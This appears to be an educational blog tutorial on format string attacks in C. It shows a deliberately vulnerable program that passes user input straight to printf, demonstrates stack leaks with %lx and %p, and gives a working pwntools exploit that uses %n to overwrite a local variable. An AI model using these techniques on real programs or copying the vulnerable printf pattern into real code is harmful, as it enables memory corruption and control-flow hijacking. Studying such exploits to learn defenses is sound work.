0x05 Format String Attack

When trying to take control over the program, one must sometimes alter information stored on the stack. StackOverflow is one possibility. It is constrained by the order of variables placed on the stack. Format String Attack allows overstepping this constraint. This kind of attack uses printf functions family vulnerability. If one use printf with a variable instead of the format string, you have your window of opportunity. Of course, if you are the one who puts data to this variable.

What kind of string formaters can be used with printf family?

What's usual case of printf?

// example.c
#include "stdio.h"

int main() {
    int addr = 0x0806cd41;
    char buf[10] = "DEADBEEF";
    int wordCount;
    printf("Starting at address %#010x we search for %s.%n\n",
            addr, buf, &wordCount);
    printf("That message contains %2$d chars, and address %1$#010x.\n",
            addr, wordCount);
    return 0;
}
$ gcc -o example -g -static example.c
$ ./example
Starting at address 0x0806cd41 we search for DEADBEEF.
That message contains 54 chars, and address 0x0806cd41.
$ 

Here we can see 'basic' usage of this feature. I started with printing integer as hex number (%x) with leading '0x' (%#) and precision set to 10 characters with leading 0 (%010). If I want to omit '0x' I would probably reduce precision to '08', because leaving '010' will print 3 leading 0s to fill declared 10 chars ('000806cd41').

%s will print string variable, it means that the second variable will be interpreted as the address to an array of printable bytes. All printed characters will be count and written to the third variable by %n. This variable is an integer passed by its address.

The second line is also interesting. Here we print saved length and our pseudo address. Interesting is the fact that passed arguments aren't in the order they are used in the format string. Here I specify which arg I want to use by %1$ or %2$.

A full list of formaters you can find in man 3 printf.

How to use this knowledge

Les't take a buggy program:

// buggy.c
#include "stdio.h"
#include "string.h"

void win() {
    printf("==============WIN===============\n");
    printf("         OK, you win!\n");
    printf("==============WIN===============\n");
}

int main() {
    char name[512];
    char msg[512];
    char task[512];
    int decision = 0;
    strcpy(msg, "Welcome %s!...\n");
    printf("Give me your name:\n");
    scanf("%s", name);
    printf(msg, name);
    printf("Now tell me what to do:\n");
    scanf("%s", task);
    printf("OK! I am on it.\n  -------ToDo-------\n");
    printf(task);
    printf("\n  -------ToDo-------\n");

    if(decision)
        win();
    return 0;
}

First, we want to print program output for the specially prepared string. What is in this special string? First, we want to have simply recognizable bytes, for example, "AAAABBBB". In little endian, it would be 42424242414141. Yes, you should know about little/big endian. If not, you would have problems with understanding what you see in gdb or program output. Next, we want to use %x to show what is on the stack. In this case, I have a 64-bit program so I would use %lx format string to print all 8 bytes placed on the stack.

Printing value may be somewhat unclear, as the stack has different values every run. So for better alignment and, what is more important, to keep a steady amount of chars printed on the screen (useful for the usage of %n) I use %016lx - it prints 8 bytes hex values padded to full 16 characters. A few tries show me that my string lays deep into the stack.

This is what I've got:

$ python3 -c \
   "print('Bob\nAAAABBBB'+''.join([f'-{i+128}.%{i+128}\$016lx' for i in range(32)])+'\n')"\
   | ./buggy
Give me your name:
Welcome Bob!...
Now tell me what to do:
OK! I am on it.
  -------ToDo-------
AAAABBBB-128.0000000000000000-129.00007f64ff3a2170-130.00007f64ff3a2170-
131.00007f64ff191bb8-132.00007fff65a5aea0-133.00007f64ff17d4d7-134.0000000000000000-
135.0000000000000000-136.4242424241414141-137.3231252e3832312d-138.2d786c3631302438-
139.393231252e393231-140.312d786c36313024-141.24303331252e3033-142.33312d786c363130-
143.3024313331252e31-144.3233312d786c3631-145.313024323331252e-146.2e3333312d786c36-
147.3631302433333125-148.252e3433312d786c-149.6c36313024343331-150.31252e3533312d78-
151.786c363130243533-152.3331252e3633312d-153.2d786c3631302436-154.373331252e373331-
155.312d786c36313024-156.24383331252e3833-157.33312d786c363130-158.3024393331252e39-
159.3034312d786c3631
  -------ToDo-------

From program output, we can deduce that our string is a 136th argument on the stack. Let's check this with unique "DEADBEEF" (4645454244454144):

$ ./buggy
Give me your name:
Bob
Welcome Bob!...
Now tell me what to do:
DAEDBEEF.%136$016lx
OK! I am on it.
  -------ToDo-------
DAEDBEEF.4645454244454144
  -------ToDo-------

Here I want to mention that there are few calling conventions [CCnv]. In this case, we have System V ABI, so arguments are passed by rdi, rsi, rdx and rsx. And this is the reason why our string is so deep in the stack. As the first argument, it is passed by rdi and isn't placed on the stack by the function. So the 136th value on the stack is, in fact, original variable task.

In CTF or other challenges, programs will be probably compiled with an optimal configuration for planned vulnerability, but here I want to get some program compiled on the standard system without special flags. All this to get real filling on the matter. Often I read something that seems easy but in the try, something is missing or unspoken. And sometimes the problem lays in the 'special way of compilation'.

By default, gcc compile example buggy with some security techniques. This knowledge will be very important for the next step - exploiting.

$ checksec buggy
[*] './buggy'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

The good part

In our case, this one vulnerability gives us a little. Every time a program can be placed at a different memory location. So we cannot calculate proper address and overwrite target variable in one run of scanf/printf. Fortunately, there is another bug we can use. What's a coincidence.

What if one overflows name variable.

$ python3 -c "print(512*'A'+'try this:%s\n')" | ./buggy
Give me your name:
tryNow tell me what to do:
OK! I am on it.
  -------ToDo-------
this:this:----ToDo-------
o do:

  -------ToDo-------

Hmm, one can do better.

$ python3 -c "print(512*'A'+'name_address:_%p_')" | ./buggy 
Give me your name:
name_address:_0x7fff163f0ad0_Now tell me what to do:
OK! I am on it.
  -------ToDo-------

  -------ToDo-------

So, we have an address of the name variable. From gdb we know the address of decision variable.

 ...
0x00000000000007e7 <+82>:  lea    rax,[rbp-0x610]  #name
0x00000000000007ee <+89>:  mov    rsi,rax
0x00000000000007f1 <+92>:  lea    rdi,[rip+0x18a]
0x00000000000007f8 <+99>:  mov    eax,0x0
0x00000000000007fd <+104>: call   0x640 <__isoc99_scanf@plt>
 ...
0x0000000000000873 <+222>: cmp    DWORD PTR [rbp-0x614],0x0

decision is 4 bytes above name. Exploit should extract name buffer address subtract 4 bytes and make payload. Worth to remember, our address has 6 bytes. It means that 2 higher bytes are the 00s. If we start our payload with it, it would be a very short payload. So let's place it at the end: AAAAAAAA-%138$n<address>. First 8 bytes as we know are at the 136th place. So -%138$n will be the 137th and out address 138th - this is why in the payload we have this value before n.

So exploit which overwrites decision variable looks like this:

from binascii import hexlify
from pwn import *

p = process('./buggy')
#gdb.attach(p)
print(p.readline())
name = 512*'A'+'__%p__'
p.sendline(name)
line = p.readline()
print(line)
address = line.split(b'__')[1]
print(f"address: {address}")
addr = int(address, 16)
addr -= 4
print(f"address of boolean: {hex(addr)}")
payload = b'AAAAAAAA-%138$n-' + p64(addr)
p.sendline(payload)
print(p.recv())
$ python3 buggy_exploit.py
[+] Starting program './buggy': Done
b'Give me your name:\n'
b'__0x7ffc26994b00__Now tell me what to do:\n'
address: b'0x7ffc26994b00'
address of boolean: 0x7ffc26994afc
b'OK! I am on it.\n  -------ToDo-------\nAAAAAAAA--\xfcJ\x99&\xfc\x7f\n  -------ToDo-------\n==============WIN===============\n         OK, you win!\n==============WIN===============\n'
[*] Program './buggy' stopped with exit code 0

It's not the end of this topic. What I've learned from this, but not expected to, is how good are default security mechanisms implemented in our compilators. How much benefit they give us. I have to rewrite buggy example a few times, so I can later exploit it in this way. These security techniques do not fix programmers mistakes but make exploiting them more difficult or impossible.

And I know, this example programs looks way too 80's. No one writes like that now. But, should bad code looks pretty...

...SQUEAK!

 

References:

Comments

Comments powered by Disqus